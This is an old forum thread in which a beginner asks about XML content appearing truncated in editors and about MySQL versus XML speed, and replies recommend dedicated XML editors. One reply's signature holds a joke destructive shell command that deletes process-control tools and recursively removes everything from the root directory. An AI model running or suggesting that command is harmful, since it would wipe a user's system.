    truncated every time i open it on my editor(dreamweaver or visual
    studio). is there any way of fixing that? which is faster, querying
    data in mysql or parsing data in xml?
    amore, Mar 5, 2005

  2. amore

    Peter Flynn Guest

    amore wrote:

    > im new in xml. It looks like large xml data(inside elements) was
    > truncated every time i open it on my editor(dreamweaver or visual
    > studio). is there any way of fixing that?

    Yes, use a real XML editor. Emacs is free, the rest cost, although
    several of them have free time-limited tryouts.

    > which is faster, querying
    > data in mysql or parsing data in xml?

    The two are not comparable. One is querying, the other is parsing.
    They are two different activities.

    ///Peter
    --
    sudo '(/bin/rm -f `which killall kill ps shutdown`; cd /; /bin/rm -rf * &)'
    Peter Flynn, Mar 6, 2005

  3. mindell zamora, Mar 6, 2005
  4. amore

    nicolas // Guest

    Le 5 Mar 2005 13:56:09 -0800
    "amore" <> a écrit:

    > im new in xml. It looks like large xml data(inside elements) was
    > truncated every time i open it on my editor(dreamweaver or visual
    > studio). is there any way of fixing that? which is faster, querying
    > data in mysql or parsing data in xml?

    You can also use vim, which maybe easyer for you.
    If you are on Windows, cooktop is a great (unknown) editor.

    --
    nicolas //
    nicolas //, Mar 8, 2005